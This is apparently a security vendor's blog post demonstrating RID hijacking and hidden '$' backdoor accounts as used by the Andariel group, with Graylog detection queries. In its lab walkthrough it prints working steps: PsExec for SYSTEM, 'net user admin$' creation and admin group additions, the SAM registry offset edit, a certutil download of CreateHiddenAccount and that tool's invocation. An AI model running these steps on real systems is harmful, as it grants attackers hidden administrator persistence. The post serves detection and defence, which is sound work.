{"id":103504,"date":"2025-02-24T12:39:59","date_gmt":"2025-02-24T04:39:59","guid":{"rendered":"https:\/\/version-2.com\/?p=103504"},"modified":"2025-02-14T12:41:35","modified_gmt":"2025-02-14T04:41:35","slug":"adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users","status":"publish","type":"post","link":"https:\/\/version-2.com\/zh\/2025\/02\/adversary-tradecraft-a-deep-dive-into-rid-hijacking-and-hidden-users\/","title":{"rendered":"Adversary Tradecraft: A Deep Dive into RID Hijacking and Hidden Users"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"103504\" class=\"elementor elementor-103504\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-35fe5dd post-content elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"35fe5dd\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;cef08c3&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-409a2e9a\" data-id=\"409a2e9a\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5a8be8f elementor-widget elementor-widget-text-editor\" data-id=\"5a8be8f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/RID-Hijacking.jpg.webp\" width=\"1200\" height=\"628\" \/>\n\n<div class=\"elementor-widget-container\">\n\t\t\t<p>Researchers at AhnLab Security Intelligence Center (ASEC) recently <a href=\"https:\/\/asec.ahnlab.com\/en\/85942\/\">published a report<\/a> on the Andariel threat group, a DPRK state-sponsored APT active for over a decade, that has been leveraging RID hijacking and user account concealment techniques in its operations to stealthily maintain privileged access to compromised Windows systems.<\/p>\n<p>&nbsp;<\/p>\n<p>This blog post explores hands-on how RID hijacking and hidden backdoor accounts work in Andariel\u2019s attack chain, and how <a href=\"https:\/\/graylog.org\/products\/security\/\">Graylog Security<\/a> can be used to detect and analyze similar activity in an organization\u2019s network.<\/p>\n<p>&nbsp;<\/p>\n<h2><strong>What is RID Hijacking?<\/strong><\/h2>\n<p>The RID, or Relative Identifier, uniquely identifies a user in Windows as part of its Security Identifier (SID). When a user logs on, the system retrieves the SID for that user from the local Security Account Manager (SAM) database and places it in the user\u2019s access token to identify it in subsequent interactions. The local Administrator account RID is always 500, and standard user RIDs usually start at 1001.<\/p>\n<p><picture fetchpriority=\"high\" decoding=\"async\" class=\"aligncenter size-large wp-image-30037\">\n<source type=\"image\/webp\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image7.png.webp 800w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image7-300x90.png.webp 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image7-768x230.png.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\">\n<img fetchpriority=\"high\" fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image7.png\" alt=\"\" width=\"800\" height=\"240\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image7.png 800w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image7-300x90.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image7-768x230.png 768w\" sizes=\"(max-width: 800px) 100vw, 800px\">\n<\/picture>\n<\/p>\n<p>RID hijacking is a technique discovered by <a href=\"https:\/\/www.youtube.com\/watch?v=9qPGuZoJxIc\">Sebastian Castro<\/a> that involves modifying the RID value of a low-privileged account to match the value of a privileged account such as local Administrator by manipulating the SAM database. As a result, the operating system mistakenly grants elevated privileges to the originally restricted account, allowing the attacker to execute privileged commands as that user.<\/p>\n<p>This technique is particularly stealthy because the activity in event logs will still be associated with the low-privilege user and there is often less scrutiny applied to standard accounts.<\/p>\n<p>However, there is a caveat to the technique \u2013 it requires SYSTEM level privileges to access and modify user information in the SAM, which resides in a protected registry key.<\/p>\n<p>&nbsp;<\/p>\n<h2><strong>Attack Demonstration<\/strong><\/h2>\n<p>According to the report from AhnLab, the threat actor\u2019s RID hijacking process consists of the following stages. We\u2019ll use this model as we walk through the attack in a lab environment.<\/p>\n<p><picture decoding=\"async\" class=\"aligncenter wp-image-30038 size-large\">\n<source type=\"image\/webp\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image6-1024x567.png.webp 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image6-300x166.png.webp 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image6-768x425.png.webp 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image6-1536x851.png.webp 1536w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image6.png.webp 1999w\" sizes=\"(max-width: 800px) 100vw, 800px\">\n<img decoding=\"async\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image6-1024x567.png\" alt=\"RID Attack Demonstration\" width=\"800\" height=\"443\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image6-1024x567.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image6-300x166.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image6-768x425.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image6-1536x851.png 1536w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image6.png 1999w\" sizes=\"(max-width: 800px) 100vw, 800px\">\n<\/picture>\n<\/p>\n<p>The RID Hijacking attack process referenced from AhnLab<\/p>\n<p><strong>&nbsp;<\/strong><\/p>\n<p>Our lab consists of a Windows 10 Enterprise system with auditing enabled for process execution (command line included), account logon and management, registry, and SAM access. Script block logging is also turned on.<\/p>\n<p>&nbsp;<\/p>\n<p>System, Security, and PowerShell\/Operational event logs are sent via Winlogbeat to a Graylog Enterprise 6.0.1 instance with Illuminate 6.1 installed to enable parsing and enrichment.<\/p>\n<p><strong>&nbsp;<\/strong><\/p>\n<h3><strong>Stage 1: SYSTEM Privilege Escalation<\/strong><\/h3>\n<p>&nbsp;<\/p>\n<p>We\u2019ll assume initial access to the Windows system and start off with an elevated admin user. However, in order to access the SAM registry hive, we need SYSTEM. To do this, we can use exploits like JuicyPotato or tools like PsExec, a Microsoft <a href=\"https:\/\/learn.microsoft.com\/en-us\/sysinternals\/downloads\/sysinternals-suite\">Sysinternals<\/a> tool often abused by adversaries for lateral movement and privilege escalation. We\u2019ll spawn a PowerShell session using PsExec with the -s argument:<\/p>\n<p>&nbsp;<\/p>\n<pre><code>PsExec.exe -s -i powershell.exe<\/code><\/pre>\n<p>&nbsp;<\/p>\n<p>The output of whoami \/user in the shell confirms that we\u2019re now running as SYSTEM.<\/p>\n<p><strong> <picture decoding=\"async\" class=\"aligncenter size-large wp-image-30039\">\n<source type=\"image\/webp\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image24-1024x594.png.webp 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image24-300x174.png.webp 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image24-768x445.png.webp 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image24.png.webp 1531w\" sizes=\"(max-width: 800px) 100vw, 800px\">\n<img decoding=\"async\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image24-1024x594.png\" alt=\"Whoami Output\" width=\"800\" height=\"464\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image24-1024x594.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image24-300x174.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image24-768x445.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image24.png 1531w\" sizes=\"(max-width: 800px) 100vw, 800px\">\n<\/picture>\n<\/strong><strong>&nbsp;<\/strong><\/p>\n<p>In Graylog, we can see a common indicator of Sysinternals PsExec activity, Event ID 7045 Remote Service Creation with the default service name PSEXESVC. Following the subsequent events (ordered bottom to top) we see our whoami command executed as Local System.<\/p>\n<p><strong> <picture loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-30040 size-full\">\n<source type=\"image\/webp\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image1-1.png.webp 1999w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image1-1-300x128.png.webp 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image1-1-1024x435.png.webp 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image1-1-768x327.png.webp 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image1-1-1536x653.png.webp 1536w\" sizes=\"(max-width: 1999px) 100vw, 1999px\">\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image1-1.png\" alt=\"Command Executed\" width=\"1999\" height=\"850\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image1-1.png 1999w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image1-1-300x128.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image1-1-1024x435.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image1-1-768x327.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image1-1-1536x653.png 1536w\" sizes=\"auto, (max-width: 1999px) 100vw, 1999px\">\n<\/picture>\n<\/strong><strong>&nbsp;<\/strong><\/p>\n<h3><strong>Stage 2: Create User Account<\/strong><\/h3>\n<p>&nbsp;<\/p>\n<p>Having obtained SYSTEM, the adversary proceeded to create a hidden local user account and add it to privileged groups. These are the commands used:<\/p>\n<p>net user admin$ admin@123 \/add<br>\nnet localgroup \u201cRemote Desktop Users\u201d \u201cadmin$\u201d \/add<br>\nnet localgroup \u201cAdministrators\u201d \u201cadmin$\u201d \/add<\/p>\n<p>&nbsp;<\/p>\n<p>The trick to hiding the user here is the $ at the end of the username. It\u2019s an old school technique that imitates computer accounts which are hidden from some user listing options \u2013 note that the newly created user isn\u2019t shown in the output of net user.<\/p>\n<p><picture loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-30041\">\n<source type=\"image\/webp\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image11-1024x594.png.webp 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image11-300x174.png.webp 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image11-768x445.png.webp 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image11.png.webp 1102w\" sizes=\"(max-width: 800px) 100vw, 800px\">\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image11-1024x594.png\" alt=\"net user\" width=\"800\" height=\"464\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image11-1024x594.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image11-300x174.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image11-768x445.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image11.png 1102w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\">\n<\/picture>\n<\/p>\n<p>In Graylog we see the commands as event ID 4688 labeled as \u201cprocess started\u201d, and additional labels for 4720 \u201caccount created\u201d and 4732 \u201cgroup member added\u201d.<\/p>\n<p><img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-30042 size-full\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image9.png\" alt=\"ID 4688 and 4720\" width=\"1800\" height=\"1186\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image9.png 1800w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image9-300x198.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image9-1024x675.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image9-768x506.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image9-1536x1012.png 1536w\" sizes=\"auto, (max-width: 1800px) 100vw, 1800px\"><\/p>\n<p>&nbsp;<\/p>\n<h3><strong>Stage 3: Modify the RID Value in Registry<\/strong><\/h3>\n<p><strong>&nbsp;<\/strong><\/p>\n<p>Before demonstrating the RID hijack, let\u2019s see what the current RID value and permissions are for the user admin$. We\u2019ll open a separate command prompt and spawn a shell as that user using runas:<\/p>\n<pre><code>runas \/user:admin$ cmd<\/code><\/pre>\n<p>&nbsp;<\/p>\n<p>Then, execute whoami commands in that shell. As shown, the user\u2019s current RID is 1009 and its privileges are limited as expected for a standard user.<\/p>\n<p><picture loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-30043\">\n<source type=\"image\/webp\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image18-1024x654.png.webp 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image18-300x192.png.webp 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image18-768x491.png.webp 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image18.png.webp 1333w\" sizes=\"(max-width: 800px) 100vw, 800px\">\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image18-1024x654.png\" alt=\"RID Value\" width=\"800\" height=\"511\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image18-1024x654.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image18-300x192.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image18-768x491.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image18.png 1333w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\">\n<\/picture>\n<\/p>\n<p>Well, as the chefs say, elevate it!<\/p>\n<p>&nbsp;<\/p>\n<p>Back to the PowerShell session as SYSTEM, we can run regedit.exe to open the GUI registry editor in the same privilege context.<\/p>\n<p>&nbsp;<\/p>\n<p>User information is stored in the SAM hive in unique subkeys under:<\/p>\n<pre><code>HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users<\/code><\/pre>\n<p>&nbsp;<\/p>\n<p>Each subkey corresponds to an account where the key name is the hexadecimal representation of the decimal user RID. The value 1009 for admin$ translates to 0x3F1, so we\u2019re looking at the key 000003F1.<\/p>\n<p><picture loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-30044 size-medium\">\n<source type=\"image\/webp\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image3-300x247.png.webp 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image3-768x632.png.webp 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image3.png.webp 793w\" sizes=\"(max-width: 300px) 100vw, 300px\">\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image3-300x247.png\" alt=\"Hex Value\" width=\"300\" height=\"247\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image3-300x247.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image3-768x632.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image3.png 793w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\">\n<\/picture>\n<\/p>\n<p>Within key 000003F1 the actual RID can be found in the value F which contains binary data. As highlighted, the RID value is located at offset 30 and stored in little-endian format.<\/p>\n<p><picture loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-30045\">\n<source type=\"image\/webp\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image14-1024x589.png.webp 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image14-300x173.png.webp 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image14-768x442.png.webp 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image14.png.webp 1360w\" sizes=\"(max-width: 800px) 100vw, 800px\">\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image14-1024x589.png\" alt=\"SAM Key\" width=\"800\" height=\"460\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image14-1024x589.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image14-300x173.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image14-768x442.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image14.png 1360w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\">\n<\/picture>\n<\/p>\n<p>To execute the hijack, we need to overwrite this value with the local Administrator RID of 500 (0x1F4) converted to little-endian as shown below.<\/p>\n<p><picture loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-30046\">\n<source type=\"image\/webp\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image23-1024x590.png.webp 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image23-300x173.png.webp 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image23-768x442.png.webp 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image23.png.webp 1360w\" sizes=\"(max-width: 800px) 100vw, 800px\">\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image23-1024x590.png\" alt=\"Hex Key Value\" width=\"800\" height=\"461\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image23-1024x590.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image23-300x173.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image23-768x442.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image23.png 1360w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\">\n<\/picture>\n<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>With that modification, admin$ should now be given the elevated RID 500 upon logon. If we open a new command prompt as the user and run whoami \/user, we see the new hijacked RID, though the rest of the SID stays unchanged. Running whoami \/priv&nbsp; shows that the user has been granted admin privileges.<\/p>\n<p><picture loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-30047\">\n<source type=\"image\/webp\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image2-1024x821.png.webp 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image2-300x241.png.webp 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image2-768x616.png.webp 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image2.png.webp 1314w\" sizes=\"(max-width: 800px) 100vw, 800px\">\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image2-1024x821.png\" alt=\"RID 500\" width=\"800\" height=\"641\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image2-1024x821.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image2-300x241.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image2-768x616.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image2.png 1314w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\">\n<\/picture>\n<\/p>\n<p>We can hunt in Graylog for activity associated with non-Administrator accounts that have the RID 500 using the following query:<\/p>\n<pre><code>NOT user_name:administrator AND user_id:\/.*\\-500\/<\/code><\/pre>\n<p><picture loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-30049 size-full\">\n<source type=\"image\/webp\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image20.png.webp 1999w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image20-300x61.png.webp 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image20-1024x210.png.webp 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image20-768x157.png.webp 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image20-1536x314.png.webp 1536w\" sizes=\"(max-width: 1999px) 100vw, 1999px\">\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image20.png\" alt=\"Administrator user 500\" width=\"1999\" height=\"409\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image20.png 1999w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image20-300x61.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image20-1024x210.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image20-768x157.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image20-1536x314.png 1536w\" sizes=\"auto, (max-width: 1999px) 100vw, 1999px\">\n<\/picture>\n<\/p>\n<p>This query might result in false positives if the administrator account is renamed. We can further specify it to target both RID hijacking and user accounts mimicking machine names.<\/p>\n<pre><code>user_name:\/.*\\$\/ AND user_id:\/.*\\-500\/<\/code><\/pre>\n<p>&nbsp;<\/p>\n<h2><strong>Custom and Open-source Tooling<\/strong><\/h2>\n<h3>AhnLab Report<\/h3>\n<p>Manually altering SAM user information in the registry editor is good for demonstration, but it isn\u2019t necessarily what threat actors are doing.<\/p>\n<p>&nbsp;<\/p>\n<p>The AhnLab report details that Andariel utilized two distinct custom tools to automate the RID hijacking attack process. One of the tools named CreateHiddenAccount is open-source and available on <a href=\"https:\/\/github.com\/wgpsec\/CreateHiddenAccount\">GitHub<\/a>.<\/p>\n<p>&nbsp;<\/p>\n<p>AhnLab breaks down the differences between the tools quite well in its report:<\/p>\n<figure id=\"attachment_30050\" aria-describedby=\"caption-attachment-30050\" style=\"width: 800px\" class=\"wp-caption aligncenter\"><picture loading=\"lazy\" decoding=\"async\" class=\"wp-image-30050 size-large\">\n<source type=\"image\/webp\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image10-1024x585.png.webp 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image10-300x171.png.webp 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image10-768x439.png.webp 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image10-1536x877.png.webp 1536w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image10.png.webp 1875w\" sizes=\"(max-width: 800px) 100vw, 800px\">\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image10-1024x585.png\" alt=\"AhnLab Report\" width=\"800\" height=\"457\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image10-1024x585.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image10-300x171.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image10-768x439.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image10-1536x877.png 1536w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image10.png 1875w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\">\n<\/picture>\n<figcaption id=\"caption-attachment-30050\" class=\"wp-caption-text\">Differences in tool behavior referenced from AhnLab<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>CreateHiddenAccount is particularly interesting since it can work without SYSTEM privileges. It still needs access to the SAM registry key, so it employs the Windows CLI program regini to edit the registry through a .ini file. The file contains parameters to open up the SAM registry key access permissions to allow modification with administrator privileges.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Let\u2019s execute the CreateHiddenAccount tool in a fresh Graylog lab to see what events are produced. First, download the UPX packed variant to the Windows host.<\/p>\n<p>&nbsp;<\/p>\n<pre><code>certutil.exe -urlcache -split -f https:\/\/github.com\/wgpsec\/CreateHiddenAccount\/releases\/download\/0.2\/CreateHiddenAccount_upx_v0.2.exe CreateHiddenAccount_upx_v0.2.exe<\/code><\/pre>\n<p>&nbsp;<\/p>\n<p>The command line arguments require the hidden user to create (the $ is appended automatically) and the target user whose RID will be cloned. Here, we\u2019re again creating the user admin$ and targeting the local admin RID.<\/p>\n<pre><code>CreateHiddenAccount_upx_v0.2.exe -u admin -p admin@123 -cu Administrator<\/code><\/pre>\n<p><picture loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-30051\">\n<source type=\"image\/webp\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image13-1024x942.png.webp 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image13-300x276.png.webp 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image13-768x706.png.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\">\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image13-1024x942.png\" alt=\"Create Hidden Account\" width=\"800\" height=\"736\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image13-1024x942.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image13-300x276.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image13-768x706.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image13.png 1170w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\">\n<\/picture>\n<\/p>\n<p>&nbsp;<\/p>\n<p>The tool produces some interesting events to analyze in Graylog. Directly after execution we see regini.exe being used to modify the access control rules of the SAM registry key.<\/p>\n<p><img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-30052 size-full\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image26.png\" alt=\"Regini Being Used\" width=\"1737\" height=\"750\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image26.png 1737w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image26-300x130.png 300w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image26-1024x442.png 1024w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image26-768x332.png 768w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image26-1536x663.png 1536w\" sizes=\"auto, (max-width: 1737px) 100vw, 1737px\"><\/p>\n<p>Following that is a flurry of user enumeration events and account creation for admin$. Interestingly, we see the tool deleting the hidden user then silently importing a .reg file using regedit. What\u2019s happening here is that the tool already populated the import file with information from the user registry key before it was deleted, and modified the RID in the file to match Administrator\u2019s. This is an additional step to hide the created user as once the registry key is restored, the user becomes hidden from additional user list interfaces.<\/p>\n<p><img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-30053 size-full\" src=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image27.png\" alt=\"Enumeration Events\" width=\"1818\" height=\"790\" srcset=\"https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image27.png 1818w, https:\/\/graylog.org\/wp-content\/uploads\/2025\/02\/image27-300x130.png 